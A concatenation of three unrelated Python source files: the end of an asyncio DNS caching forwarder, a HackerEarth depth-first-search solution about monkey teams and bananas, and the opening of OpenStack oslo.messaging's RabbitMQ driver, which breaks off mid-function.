# Create new wait list for this query and submit request
if entry is None:
entry = DnsWaitTableEntry(time.time(), [(addr, id)])
wait_table.set((request.qname, request.qtype, request.qclass), entry)
# Post query to forwarder -> (request)
logging.debug('CACHE: Forwarder POST %s' % (request.qname))
next_in.put(request)
# Request is pending so add client to wait list
else:
# # Query has expired so reset wait list
# if (entry.start + timeout) <= time.time():
# raise KeyError
# Check if client is already waiting
wait_list = entry.wait_list
for i, entry in enumerate(wait_list):
# Use ID of latest request
if entry[0] == addr:
wait_list[i] = (addr, id)
continue
# Add client to wait list
wait_list.append((addr, id))
async def cache_async_write(cache, wait_table, out_queue, next_out):
while True:
# Get response from the forwarder <- (request, response)
request, response = await next_out.coro_get()
logging.debug('CACHE: Forwarder GET %s' % (request.qname))
# Add entry to cache
cache.put((request.qname, request.qtype, request.qclass), response)
# Reply to clients waiting for this query
entry = wait_table.get((request.qname, request.qtype, request.qclass))
# No clients are waiting on this query
if entry is None:
continue
# Clients are waiting so create and send replies
reply_list = entry.wait_list
for (addr, id) in reply_list:
# Prepare answer to query
response.response.id = id
answer = response.response.to_wire()
# Post response to client -> (answer, addr)
out_queue.put((answer, addr))
logging.debug('CACHE: Client POST %s' % (request.qname))
# Remove wait list for this query
wait_table.delete((request.qname, request.qtype, request.qclass))
async def active_cache_async(cache, period, out_queue):
"""
Worker to process cache entries and preemptively replace expired or almost expired entries.
Params:
cache - cache object to store data in for quick retrieval (synchronized)
period - time to wait between cache scans (in seconds)
out_queue - queue object to send requests for further processing (synchronized)
"""
while True:
expired = cache.expired(period)
for key in expired:
request = DnsRequest(*key)
out_queue.put(request)
if len(expired) > 0:
logging.info('CACHE: Updated %d/%d entries' % (len(expired), len(cache.data)))
logging.info('CACHE: Hits %d, Misses %d, Ratio %.2f' % (cache.hits, cache.misses, cache.ratio()))
await asyncio.sleep(period)
################################################################################
################################################################################
class UdpDnsForward(asyncio.DatagramProtocol):
"""
DNS over UDP forwarder.
"""
def __init__(self, out_queue):
self.out_queue = out_queue
super().__init__()
def connection_made(self, transport):
self.transport = transport
def datagram_received(self, data, addr):
asyncio.ensure_future(self.process_packet(data))
async def process_packet(self, answer):
answer = dns.message.from_wire(answer)
request = DnsRequest(answer.question[0].name, answer.question[0].rdtype, answer.question[0].rdclass)
response = dns.resolver.Answer(request.qname, request.qtype, request.qclass, answer, False)
logging.debug('FORWARDER: Cache POST %s' % (request.qname))
self.out_queue.put((request, response))
def forwarder_worker(upstream, timeout, in_queue, out_queue):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
# Connect to remote server
udp_forward = loop.create_datagram_endpoint(lambda: UdpDnsForward(out_queue), remote_addr=upstream)
transport, protocol = loop.run_until_complete(udp_forward)
asyncio.ensure_future(forwarder_async(transport, in_queue))
loop.run_forever()
async def forwarder_async(transport, in_queue):
while True:
request = await in_queue.coro_get()
logging.debug('FORWARDER: Cache GET %s' % (request.qname))
query = dns.message.make_query(request.qname, request.qtype, request.qclass)
query = query.to_wire()
transport.sendto(query)
################################################################################
async def forwarder_async2(sock, timeout, in_queue, out_queue):
while True:
request = await in_queue.coro_get()
logging.debug('forwarder: Cache GET %s' % (request.qname))
query = dns.message.make_query(request.qname, request.qtype, request.qclass)
query = query.to_wire()
answer, rtt = await udp_request(sock, query, timeout)
if answer == b'':
response = None
else:
answer = dns.message.from_wire(answer)
response = dns.resolver.Answer(request.qname, request.qtype, request.qclass, answer, False)
await out_queue.coro_put((request, response))
logging.debug('forwarder: Cache POST %s' % (request.qname))
if __name__ == '__main__':
main()
|
kingdom_monkeys.py
|
"""
Codemonk link: https://www.hackerearth.com/practice/algorithms/graphs/depth-first-search/practice-problems/algorithm/kingdom-of-monkeys/
This is the story in Zimbo, the kingdom officially made for monkeys. Our Code Monk visited Zimbo and declared open a
challenge in the kingdom, thus spoke to all the monkeys: You all have to make teams and go on a hunt for Bananas. The
team that returns with the highest number of Bananas will be rewarded with as many gold coins as the number of Bananas
with them. May the force be with you! Given there are N monkeys in the kingdom. Each monkey who wants to team up with
another monkey has to perform a ritual. Given total M rituals are performed. Each ritual teams up two monkeys. If
Monkeys A and B teamed up and Monkeys B and C teamed up, then Monkeys A and C are also in the same team. You are given
an array A where Ai is the number of bananas i'th monkey gathers. Find out the number of gold coins that our Monk should
set aside for the prize.
Input - Output:
First line contains an integer T. T test cases follow.
First line of each test case contains two space-separated N and
M. M lines follow. Each of the M lines contains two integers Xi and Yi,
the indexes of monkeys that perform the i' th ritual.
Last line of the testcase contains N space-separated integer constituting the array A.
Print the answer to each test case in a new line.
Sample input:
1
4 3
1 2
2 3
3 1
1 2 3 5
Sample Output:
6
"""
"""
We find all the connected vertices with DFS and while doing so we also calculate the sum of all the collected bananas
of all monkeys in all the groups. We need the group that has gathered the maximum amount of bananas. The answer is the
amount of bananas.
Final complexity: O(NODES+EDGES)
"""
import sys
from sys import stdin, stdout
import threading
threading.stack_size(200000000)
sys.setrecursionlimit(10**6)
def dfs(graph, begin, visited, bananas):
amount = bananas[begin-1]
visited.add(begin)
for node in graph[begin-1]:
if node == -1:
continue
if node not in visited:
amount += dfs(graph, node, visited, bananas)
return amount
def main():
inp_len = int(stdin.readline())
for _ in range(inp_len):
n, m = map(int, stdin.readline().split())
graph = [[-1] for _ in range(n)]
for _ in range(m):
x, y = map(int, stdin.readline().split())
if graph[x-1][0] == -1:
graph[x-1][0] = y
else:
graph[x-1].append(y)
if graph[y-1][0] == -1:
graph[y-1][0] = x
else:
graph[y-1].append(x)
bananas = list(map(int, stdin.readline().split()))
visited = set()
max_bananas = -1
for i in range(len(graph)):
if i+1 not in visited:
max_bananas = max(dfs(graph, i+1, visited, bananas), max_bananas)
stdout.write(str(max_bananas) + "\n")
thread = threading.Thread(target=main)
thread.start()
|
impl_rabbit.py
|
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import errno
import functools
import itertools
import math
import os
import random
import socket
import ssl
import sys
import threading
import time
from urllib import parse
import uuid
from amqp import exceptions as amqp_exec
import kombu
import kombu.connection
import kombu.entity
import kombu.messaging
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import eventletutils
from oslo_utils import importutils
import oslo_messaging
from oslo_messaging._drivers import amqp as rpc_amqp
from oslo_messaging._drivers import amqpdriver
from oslo_messaging._drivers import base
from oslo_messaging._drivers import common as rpc_common
from oslo_messaging._drivers import pool
from oslo_messaging import _utils
from oslo_messaging import exceptions
eventlet = importutils.try_import('eventlet')
if eventlet and eventletutils.is_monkey_patched("thread"):
# Here we initialize module with the native python threading module
# if it was already monkey patched by eventlet/greenlet.
stdlib_threading = eventlet.patcher.original('threading')
else:
# Manage the case where we run this driver in a non patched environment
# and where user even so configure the driver to run heartbeat through
# a python thread, if we don't do that when the heartbeat will start
# we will facing an issue by trying to override the threading module.
stdlib_threading = threading
# NOTE(sileht): don't exist in py2 socket module
TCP_USER_TIMEOUT = 18
rabbit_opts = [
cfg.BoolOpt('ssl',
default=False,
deprecated_name='rabbit_use_ssl',
help='Connect over SSL.'),
cfg.StrOpt('ssl_version',
default='',
deprecated_name='kombu_ssl_version',
help='SSL version to use (valid only if SSL enabled). '
'Valid values are TLSv1 and SSLv23. SSLv2, SSLv3, '
'TLSv1_1, and TLSv1_2 may be available on some '
'distributions.'
),
cfg.StrOpt('ssl_key_file',
default='',
deprecated_name='kombu_ssl_keyfile',
help='SSL key file (valid only if SSL enabled).'),
cfg.StrOpt('ssl_cert_file',
default='',
deprecated_name='kombu_ssl_certfile',
help='SSL cert file (valid only if SSL enabled).'),
cfg.StrOpt('ssl_ca_file',
default='',
deprecated_name='kombu_ssl_ca_certs',
help='SSL certification authority file '
'(valid only if SSL enabled).'),
cfg.BoolOpt('heartbeat_in_pthread',
default=True,
help="Run the health check heartbeat thread "
"through a native python thread by default. If this "
"option is equal to False then the health check "
"heartbeat will inherit the execution model "
"from the parent process. For "
"example if the parent process has monkey patched the "
"stdlib by using eventlet/greenlet then the heartbeat "
"will be run through a green thread.",
deprecated_for_removal=True),
cfg.FloatOpt('kombu_reconnect_delay',
default=1.0,
deprecated_group='DEFAULT',
help='How long to wait before reconnecting in response to an '
'AMQP consumer cancel notification.'),
cfg.StrOpt('kombu_compression',
help="EXPERIMENTAL: Possible values are: gzip, bz2. If not "
"set compression will not be used. This option may not "
"be available in future versions."),
cfg.IntOpt('kombu_missing_consumer_retry_timeout',
deprecated_name="kombu_reconnect_timeout",
default=60,
help='How long to wait a missing client before abandoning to '
'send it its replies. This value should not be longer '
'than rpc_response_timeout.'),
cfg.StrOpt('kombu_failover_strategy',
choices=('round-robin', 'shuffle'),
default='round-robin',
help='Determines how the next RabbitMQ node is chosen in case '
'the one we are currently connected to becomes '
'unavailable. Takes effect only if more than one '
'RabbitMQ node is provided in config.'),
cfg.StrOpt('rabbit_login_method',
choices=('PLAIN', 'AMQPLAIN', 'RABBIT-CR-DEMO'),
default='AMQPLAIN',
deprecated_group='DEFAULT',
help='The RabbitMQ login method.'),
cfg.IntOpt('rabbit_retry_interval',
default=1,
help='How frequently to retry connecting with RabbitMQ.'),
cfg.IntOpt('rabbit_retry_backoff',
default=2,
deprecated_group='DEFAULT',
help='How long to backoff for between retries when connecting '
'to RabbitMQ.'),
cfg.IntOpt('rabbit_interval_max',
default=30,
help='Maximum interval of RabbitMQ connection retries. '
'Default is 30 seconds.'),
cfg.BoolOpt('rabbit_ha_queues',
default=False,
deprecated_group='DEFAULT',
help='Try to use HA queues in RabbitMQ (x-ha-policy: all). '
'If you change this option, you must wipe the RabbitMQ '
'database. In RabbitMQ 3.0, queue mirroring is no longer '
'controlled by the x-ha-policy argument when declaring a '
'queue. If you just want to make sure that all queues (except '
'those with auto-generated names) are mirrored across all '
'nodes, run: '
"""\"rabbitmqctl set_policy HA '^(?!amq\\.).*' """
"""'{"ha-mode": "all"}' \""""),
cfg.IntOpt('rabbit_transient_queues_ttl',
min=1,
default=1800,
help='Positive integer representing duration in seconds for '
'queue TTL (x-expires). Queues which are unused for the '
'duration of the TTL are automatically deleted. The '
'parameter affects only reply and fanout queues.'),
cfg.IntOpt('rabbit_qos_prefetch_count',
default=0,
help='Specifies the number of messages to prefetch. Setting to '
'zero allows unlimited messages.'),
cfg.IntOpt('heartbeat_timeout_threshold',
default=60,
help="Number of seconds after which the Rabbit broker is "
"considered down if heartbeat's keep-alive fails "
"(0 disables heartbeat)."),
cfg.IntOpt('heartbeat_rate',
default=2,
help='How often times during the heartbeat_timeout_threshold '
'we check the heartbeat.'),
cfg.BoolOpt('direct_mandatory_flag',
default=True,
deprecated_for_removal=True,
deprecated_reason='Mandatory flag no longer deactivable.',
help='(DEPRECATED) Enable/Disable the RabbitMQ mandatory '
'flag for direct send. The direct send is used as reply, '
'so the MessageUndeliverable exception is raised '
'in case the client queue does not exist.'
'MessageUndeliverable exception will be used to loop for a '
'timeout to lets a chance to sender to recover.'
'This flag is deprecated and it will not be possible to '
'deactivate this functionality anymore'),
cfg.BoolOpt('enable_cancel_on_failover',
default=False,
help="Enable x-cancel-on-ha-failover flag so that "
"rabbitmq server will cancel and notify consumers"
"when queue is down")
]
LOG = logging.getLogger(__name__)
def _get_queue_arguments(rabbit_ha_queues, rabbit_queue_ttl):
"""Construct the arguments for declaring a queue.
If the rabbit_ha_queues option is set, we try to declare a mirrored queue
as described here:
http://www.rabbitmq.com/ha.html
Setting x-ha-policy to all means that the queue will be mirrored
to all nodes in the cluster. In RabbitMQ 3.0, queue mirroring is
no longer controlled by the x-ha-policy argument when declaring a
queue. If you just want to make sure that all queues (except those
with auto-generated names) are mirrored across all nodes, run:
rabbitmqctl set_policy HA '^(?!amq\\.).*' '{"ha-mode": "all"}'
If the rabbit_queue_ttl option is > 0, then the queue is
declared with the "Queue TTL" value as described here:
https://www.rabbitmq.com/ttl.html
Setting a queue TTL causes the queue to be automatically deleted
if it is unused for the TTL duration. This is a helpful safeguard
to prevent queues with zero consumers from growing without bound.
"""
args = {}
if rabbit_ha_queues:
args['x-ha-policy'] = 'all'
if rabbit_queue_ttl > 0:
args['x-expires'] = rabbit_queue_ttl * 1000
return args
class RabbitMessage(dict):
def __init__(self, raw_message):
super(RabbitMessage, self).__init__(
rpc_common.deserialize_msg(raw_message.payload))
LOG.trace('RabbitMessage.Init: message %s', self)
self._raw_message = raw_message
def acknowledge(self):
LOG.trace('RabbitMessage.acknowledge: message %s', self)
self._raw_message.ack()
def requeue(self):
LOG.trace('RabbitMessage.requeue: message %s', self)
self._raw_message.requeue()
class Consumer(object):
"""Consumer class."""
def __init__(self, exchange_name, queue_name, routing_key, type, durable,
exchange_auto_delete, queue_auto_delete, callback,
nowait=False, rabbit_ha_queues=None, rabbit_queue_ttl=0,
enable_cancel_on_failover=False):
"""Init the Consumer class with the exchange_name, routing_key,
type, durable auto_delete
"""
self.queue_name = queue_name
self.exchange_name = exchange_name
self.routing_key = routing_key
self.exchange_auto_delete = exchange_auto_delete
self.queue_auto_delete = queue_auto_delete
self.durable = durable
self.callback = callback
self.type = type
self.nowait = nowait
self.queue_arguments = _get_queue_arguments(rabbit_ha_queues,
rabbit_queue_ttl)
self.queue = None
self._declared_on = None
self.exchange = kombu.entity.Exchange(
name=exchange_name,
type=type,
durable=self.durable,
auto_delete=self.exchange_auto_delete)
self.enable_cancel_on_failover = enable_cancel_on_failover
def declare(self, conn):
"""Re-declare the queue after a rabbit (re)connect."""
consumer_arguments = None
if self.enable_cancel_on_failover:
consumer_arguments = {
"x-cancel-on-ha-failover": True}
self.queue = kombu.entity.Queue(
name=self.queue_name,
channel=conn.channel,
exchange=self.exchange,
durable=self.durable,
auto_delete=self.queue_auto_delete,
routing_key=self.routing_key,
queue_arguments=self.queue_arguments,
consumer_arguments=consumer_arguments
)
try:
LOG.debug('[%s] Queue.declare: %s',
conn.connection_id, self.queue_name)
self.queue.declare()
except conn.connection.channel_errors as exc:
# NOTE(jrosenboom): This exception may be triggered by a race
# condition. Simply retrying will solve the error most of the time
# and should work well enough as a workaround until the race
# condition itself can be fixed.
# See https://bugs.launchpad.net/neutron/+bug/1318721 for details.
if exc.code == 404:
self.queue.declare()
else:
raise
except kombu.exceptions.ConnectionError as exc:
# NOTE(gsantomaggio): This exception happens when the
# connection is established,but it fails to create the queue.
# Add some delay to avoid too many requests to the server.
# See: https://bugs.launchpad.net/oslo.messaging/+bug/1822778
# for details.
if exc.code == 541:
interval = 2
info = {'sleep_time': interval,
'queue': self.queue_name,
'err_str': exc
}
LOG.error('Internal amqp error (541) '
'during queue declare,'
'retrying in %(sleep_time)s seconds. '
'Queue: [%(queue)s], '
'error message: [%(err_str)s]', info)
time.sleep(interval)
self.queue.declare()
else:
raise
self._declared_on = conn.channel
def consume(self, conn, tag):
"""Actually declare the consumer on the amqp channel. This will
start the flow of messages from the queue. Using the
Connection.consume() will process the messages,
calling the appropriate callback.
"""
# Ensure we are on the correct channel before consuming
if conn.channel != self._declared_on:
self.declare(conn)
try:
self.queue.consume(callback=self._callback,
consumer_tag=str(tag),
nowait=self.nowait)
except conn.connection.channel_errors as exc:
# We retries once because of some races that we can
# recover before informing the deployer
# https://bugs.launchpad.net/oslo.messaging/+bug/1581148
# https://bugs.launchpad.net/oslo.messaging/+bug/1609766
# https://bugs.launchpad.net/neutron/+bug/1318721
# 406 error code relates to messages that are doubled ack'd
# At any channel error, the RabbitMQ closes
# the channel, but the amqp-lib quietly re-open
# it. So, we must reset all tags and declare
# all consumers again.
conn._new_tags = set(conn._consumers.values())
if exc.code == 404 or (exc.code == 406 and
exc.method_name == 'Basic.ack'):
self.declare(conn)
self.queue.consume(callback=self._callback,
consumer_tag=str(tag),
nowait=self.nowait)
else:
raise
def cancel(self, tag):
LOG.trace('ConsumerBase.cancel: canceling %s', tag)
self.queue.cancel(str(tag))
def _callback(self, message):
"""Call callback with deserialized message.
Messages that are processed and ack'ed.
"""
m2p = getattr(self.queue.channel, 'message_to_python', None)
if m2p:
message = m2p(message)
try:
self.callback(RabbitMessage(message))
except Exception:
LOG.exception("Failed to process message ... skipping it.")
message.reject()
class DummyConnectionLock(_utils.DummyLock):
def heartbeat_acquire(self):
pass
class ConnectionLock(DummyConnectionLock):
"""Lock object to protect access to the kombu connection
This is a lock object to protect access to the kombu connection
object between the heartbeat thread and the driver thread.
They are two way to acquire this lock:
* lock.acquire()
* lock.heartbeat_acquire()
In both case lock.release(), release the lock.
The goal is that the heartbeat thread always have the priority
for acquiring the lock. This ensures we have no heartbeat
starvation when the driver sends a lot of messages.
So when lock.heartbeat_acquire() is called next time the lock
is released(), the caller unconditionally acquires
the lock, even someone else have asked for the lock before it.
"""
def __init__(self):
self._workers_waiting = 0
self._heartbeat_waiting = False
self._lock_acquired = None
self._monitor = threading.Lock()
self._workers_locks = threading.Condition(self._monitor)
self._heartbeat_lock = threading.Condition(self._monitor)
self._get_thread_id = eventletutils.fetch_current_thread_functor()
def acquire(self):
with self._monitor:
while self._lock_acquired:
self._workers_waiting += 1
self._workers_locks.wait()
self._workers_waiting -= 1
self._lock_acquired = self._get_thread_id()
def heartbeat_acquire(self):
# NOTE(sileht): must be called only one time
with self._monitor:
while self._lock_acquired is not None:
self._heartbeat_waiting = True
self._heartbeat_lock.wait()
self._heartbeat_waiting = False
self._lock_acquired = self._get_thread_id()
def release(self):
with self._monitor:
if self._lock_acquired is None:
raise RuntimeError("We can't release a not acquired lock")
thread_id = self._get_thread_id()
if self._lock_acquired != thread_id:
raise RuntimeError("We can't release lock acquired by another "
"thread/greenthread; %s vs %s" %
(self._lock_acquired, thread_id))
self._lock_acquired = None
if self._heartbeat_waiting:
self._heartbeat_lock.notify()
elif self._workers_waiting > 0:
self._workers_locks.notify()
@contextlib.contextmanager
def for_heartbeat(self):
self.heartbeat_acquire()
try:
yield
finally:
self.release()
class Connection(object):
"""Connection object."""
def __init__(self, conf, url, purpose):
# NOTE(viktors): Parse config options
driver_conf = conf.oslo_messaging_rabbit
self.interval_start = driver_conf.rabbit_retry_interval
self.interval_stepping = driver_conf.rabbit_retry_backoff
self.interval_max = driver_conf.rabbit_interval_max
self.login_method = driver_conf.rabbit_login_method
self.rabbit_ha_queues = driver_conf.rabbit_ha_queues
self.rabbit_transient_queues_ttl = \
driver_conf.rabbit_transient_queues_ttl
self.rabbit_qos_prefetch_count = driver_conf.rabbit_qos_prefetch_count
self.heartbeat_timeout_threshold = \
driver_conf.heartbeat_timeout_threshold
self.heartbeat_rate = driver_conf.heartbeat_rate
self.kombu_reconnect_delay = driver_conf.kombu_reconnect_delay
self.amqp_durable_queues = driver_conf.amqp_durable_queues
self.amqp_auto_delete = driver_conf.amqp_auto_delete
self.ssl = driver_conf.ssl
self.kombu_missing_consumer_retry_timeout = \
driver_conf.kombu_missing_consumer_retry_timeout
self.kombu_failover_strategy = driver_conf.kombu_failover_strategy
self.kombu_compression = driver_conf.kombu_compression
self.heartbeat_in_pthread = driver_conf.heartbeat_in_pthread
self.enable_cancel_on_failover = driver_conf.enable_cancel_on_failover
if self.heartbeat_in_pthread:
# NOTE(hberaud): Experimental: threading module is in use to run
# the rabbitmq health check heartbeat. in some situation like
# with nova-api, nova need green threads to run the cells
# mechanismes in an async mode, so they used eventlet and
# greenlet to monkey patch the python stdlib and get green threads.
# The issue here is that nova-api run under the apache MPM prefork
# module and mod_wsgi. The apache prefork module doesn't support
# epoll and recent kernel features, and evenlet is built over epoll
# and libevent, so when we run the rabbitmq heartbeat we inherit
# from the execution model of the parent process (nova-api), and
# in this case we will run the heartbeat through a green thread.
# We want to allow users to choose between pthread and
# green threads if needed in some specific situations.
# This experimental feature allow user to use pthread in an env
# that doesn't support eventlet without forcing the parent process
# to stop to use eventlet if they need monkey patching for some
# specific reasons.
# If users want to use pthread we need to make sure that we
# will use the *native* threading module for
# initialize the heartbeat thread.
# Here we override globaly the previously imported
# threading module with the native python threading module
# if it was already monkey patched by eventlet/greenlet.
global threading
threading = stdlib_threading
self.direct_mandatory_flag = driver_conf.direct_mandatory_flag
if self.ssl:
self.ssl_version = driver_conf.ssl_version
self.ssl_key_file = driver_conf.ssl_key_file
self.ssl_cert_file = driver_conf.ssl_cert_file
self.ssl_ca_file = driver_conf.ssl_ca_file
self._url = ''
if url.hosts:
if url.transport.startswith('kombu+'):
LOG.warning('Selecting the kombu transport through the '
'transport url (%s) is a experimental feature '
'and this is not yet supported.',
url.transport)
if len(url.hosts) > 1:
random.shuffle(url.hosts)
transformed_urls = [
self._transform_transport_url(url, host)
for host in url.hosts]
self._url = ';'.join(transformed_urls)
elif url.transport.startswith('kombu+'):
# NOTE(sileht): url have a + but no hosts
# (like kombu+memory:///), pass it to kombu as-is
transport = url.transport.replace('kombu+', '')
self._url = "%s://" % transport
if url.virtual_host:
self._url += url.virtual_host
elif not url.hosts:
host = oslo_messaging.transport.TransportHost('')
# NOTE(moguimar): default_password in this function's context is
# a fallback option, not a hardcoded password.
# username and password are read from host.
self._url = self._transform_transport_url( # nosec
url, host, default_username='guest', default_password='guest',
default_hostname='localhost')
self._initial_pid = os.getpid()
self._consumers = {}
self._producer = None
self._new_tags = set()
self._active_tags = {}
self._tags = itertools.count(1)
# Set of exchanges and queues declared on the channel to avoid
# unnecessary redeclaration. This set is resetted each time
# the connection is resetted in Connection._set_current_channel
self._declared_exchanges = set()
self._declared_queues = set()
self._consume_loop_stopped = False
self.channel = None
self.purpose = purpose
# NOTE(sileht): if purpose is PURPOSE_LISTEN
# we don't need the lock because we don't
# have a heartbeat thread
if purpose == rpc_common.PURPOSE_SEND:
self._connection_lock = ConnectionLock()
else:
self._connection_lock = DummyConnectionLock()
self.connection_id = str(uuid.uuid4())
self.name = "%s:%d:%s" % (os.path.basename(sys.argv[0]),
os.getpid(),
self.connection_id)
self.connection = kombu.connection.Connection(
self._url, ssl=self._fetch_ssl_params(),
login_method=self.login_method,
heartbeat=self.heartbeat_timeout_threshold,
failover_strategy=self.kombu_failover_strategy,
transport_options={
'confirm_publish': True,
'client_properties': {
'capabilities': {
'authentication_failure_close': True,
'connection.blocked': True,
'consumer_cancel_notify': True
},
'connection_name': self.name},
'on_blocked': self._on_connection_blocked,
'on_unblocked': self._on_connection_unblocked,
},
)
LOG.debug('[%(connection_id)s] Connecting to AMQP server on'
' %(hostname)s:%(port)s',
self._get_connection_info())
# NOTE(sileht): kombu recommend to run heartbeat_check every
# seconds, but we use a lock around the kombu connection
# so, to not lock to much this lock to most of the time do nothing
# expected waiting the events drain, we start heartbeat_check and
# retrieve the server heartbeat packet only two times more than
# the minimum required for the heartbeat works
# (heartbeat_timeout/heartbeat_rate/2.0, default kombu
# heartbeat_rate is 2)
self._heartbeat_wait_timeout = (
float(self.heartbeat_timeout_threshold) /
float(self.heartbeat_rate) / 2.0)
self._heartbeat_support_log_emitted = False
# NOTE(sileht): just ensure the connection is setuped at startup
with self._connection_lock:
self.ensure_connection()
# NOTE(sileht): if purpose is PURPOSE_LISTEN
# the consume code does the heartbeat stuff
# we don't need a thread
self._heartbeat_thread = None
if purpose == rpc_common.PURPOSE_SEND:
self._heartbeat_start()
LOG.debug('[%(connection_id)s] Connected to AMQP server on '
'%(hostname)s:%(port)s via [%(transport)s] client with'
' port %(client_port)s.',
self._get_connection_info())
# NOTE(sileht): value chosen according the best practice from kombu
# http://kombu.readthedocs.org/en/latest/reference/kombu.common.html#kombu.common.eventloop
# For heartbeat, we can set a bigger timeout, and check we receive the
# heartbeat packets regulary
if self._heartbeat_supported_and_enabled():
self._poll_timeout = self._heartbeat_wait_timeout
else:
self._poll_timeout = 1
if self._url.startswith('memory://'):
# Kludge to speed up tests.
self.connection.transport.polling_interval = 0.0
# Fixup logging
self.connection.hostname = "memory_driver"
self.connection.port = 1234
self._poll_timeout = 0.05
# FIXME(markmc): use oslo sslutils when it is available as a library
_SSL_PROTOCOLS = {
"tlsv1": ssl.PROTOCOL_TLSv1,
"sslv23": ssl.PROTOCOL_SSLv23
}
_OPTIONAL_PROTOCOLS = {
'sslv2': 'PROTOCOL_SSLv2',
'sslv3': 'PROTOCOL_SSLv3',
'tlsv1_1': 'PROTOCOL_TLSv1_1',
'tlsv1_2': 'PROTOCOL_TLSv1_2',
}
for protocol in _OPTIONAL_PROTOCOLS:
try:
_SSL_PROTOCOLS[protocol] = getattr(ssl,
_OPTIONAL_PROTOCOLS[protocol])
except AttributeError:
pass
@classmethod
def validate_ssl_version(cls, version):
key = version.lower()
try:
return cls._SSL_PROTOCOLS[key]
except KeyError:
raise RuntimeError("Invalid SSL version : %s" % version)
# NOTE(moguimar): default_password in this function's context is just
# a fallback option, not a hardcoded password.
def _transform_transport_url(self, url, host, default_username='', # nosec
default_password='', default_hostname=''):
transport = url.transport.replace('kombu+', '')
transport = transport.replace('rabbit', 'amqp')
return '%s://%s:%s@%s:%s/%s' % (
transport,
parse.quote(host.username or default_username),
parse.quote(host.password or default_password),
self._parse_url_hostname(host.hostname) or default_hostname,
str(host.port or 5672),
url.virtual_host or '')
def _parse_url_hostname(self, hostname):
"""Handles hostname returned from urlparse and checks whether it's
ipaddress. If it's ipaddress it ensures that it has brackets for IPv6.
"""
return '[%s]' % hostname if ':' in hostname else hostname
def _fetch_ssl_params(self):
"""Handles fetching what ssl params should be used for the connection
(if any).
"""
if self.ssl:
ssl_params = dict()
# http://docs.python.org/library/ssl.html - ssl.wrap_socket
if self.ssl_version:
ssl_params['ssl_version'] = self.validate_ssl_version(
self.ssl_version)
if self.ssl_key_file:
ssl_params['keyfile'] = self.ssl_key_file
if self.ssl_cert_file:
ssl_params['certfile'] = self.ssl_cert_file
if self.ssl_ca_file:
ssl_params['ca_certs'] = self.ssl_ca_file
# We might want to allow variations in the
# future with this?
ssl_params['cert_reqs'] = ssl.CERT_REQUIRED
return ssl_params or True
return False
@staticmethod
def _on_connection_blocked(reason):
LOG.error("The broker has blocked the connection: %s", reason)
@staticmethod
def _on_connection_unblocked():
LOG.info("The broker has unblocked the connection")
def ensure_connection(self):
# NOTE(sileht): we reset the channel and ensure
# the kombu underlying connection works
def on_error(exc, interval):
LOG.error("Connection failed: %s (retrying in %s seconds)",
str(exc), interval)
self._set_current_channel(None)
self.connection.ensure_connection(errback=on_error)
self._set_current_channel(self.connection.channel())
self.set_transport_socket_timeout()
def ensure(self, method, retry=None,
recoverable_error_callback=None, error_callback=None,
timeout_is_error=True):
"""Will retry up to retry number of times.
retry = None or -1 means to retry forever
retry = 0 means no retry
retry = N means N retries
NOTE(sileht): Must be called within the connection lock
"""
current_pid = os.getpid()
if self._initial_pid != current_pid:
LOG.warning("Process forked after connection established! "
"This can result in unpredictable behavior. "
"See: https://docs.openstack.org/oslo.messaging/"
"latest/reference/transport.html")
self._initial_pid = current_pid
if retry is None or retry < 0:
retry = float('inf')
def on_error(exc, interval):
LOG.debug("[%s] Received recoverable error from kombu:"
% self.connection_id,
exc_info=True)
recoverable_error_callback and recoverable_error_callback(exc)
interval = (self.kombu_reconnect_delay + interval
if self.kombu_reconnect_delay > 0
else interval)
info = {'err_str': exc, 'sleep_time': interval}
info.update(self._get_connection_info(conn_error=True))
if 'Socket closed' in str(exc):
LOG.error('[%(connection_id)s] AMQP server'
' %(hostname)s:%(port)s closed'
' the connection. Check login credentials:'
' %(err_str)s', info)
else:
LOG.error('[%(connection_id)s] AMQP server on '
'%(hostname)s:%(port)s is unreachable: '
'%(err_str)s. Trying again in '
'%(sleep_time)d seconds.', info)
# XXX(nic): when reconnecting to a RabbitMQ cluster
# with mirrored queues in use, the attempt to release the
# connection can hang "indefinitely" somewhere deep down
# in Kombu. Blocking the thread for a bit prior to
# release seems to kludge around the problem where it is
# otherwise reproduceable.
# TODO(sileht): Check if this is useful since we
# use kombu for HA connection, the interval_step
# should sufficient, because the underlying kombu transport
# connection object freed.
if self.kombu_reconnect_delay > 0:
LOG.trace('Delaying reconnect for %1.1f seconds ...',
self.kombu_reconnect_delay)
time.sleep(self.kombu_reconnect_delay)
def on_reconnection(new_channel):
"""Callback invoked when the kombu reconnects and creates
a new channel, we use it the reconfigure our consumers.
"""
self._set_current_channel(new_channel)
self.set_transport_socket_timeout()
LOG.info('[%(connection_id)s] Reconnected to AMQP server on '
'%(hostname)s:%(port)s via [%(transport)s] client '
'with port %(client_port)s.',
self._get_connection_info())
def execute_method(channel):
self._set_current_channel(channel)
method()
try:
autoretry_method = self.connection.autoretry(
execute_method, channel=self.channel,
max_retries=retry,
errback=on_error,
interval_start=self.interval_start or 1,
interval_step=self.interval_stepping,
interval_max=self.interval_max,
on_revive=on_reconnection)
ret, channel = autoretry_method()
self._set_current_channel(channel)
return ret
except rpc_amqp.AMQPDestinationNotFound:
# NOTE(sileht): we must reraise this without
# trigger error_callback
raise
except exceptions.MessageUndeliverable:
# NOTE(gsantomaggio): we must reraise this without
# trigger error_callback
raise
except Exception as exc:
error_callback and error_callback(exc)
self._set_current_channel(None)
# NOTE(sileht): number of retry exceeded and the connection
# is still broken
info = {'err_str': exc, 'retry': retry}
info.update(self.connection.info())
msg = ('Unable to connect to AMQP server on '
'%(hostname)s:%(port)s after %(retry)s '
'tries: %(err_str)s' % info)
LOG.error(msg)
raise exceptions.MessageDeliveryFailure(msg)
@staticmethod
def on_return(exception, exchange, routing_key, message):
raise exceptions.MessageUndeliverable(exception, exchange, routing_key,
message)
def _set_current_channel(self, new_channel):
"""Change the channel to use.
NOTE(sileht): Must be called within the connection lock
"""
if new_channel == self.channel:
return
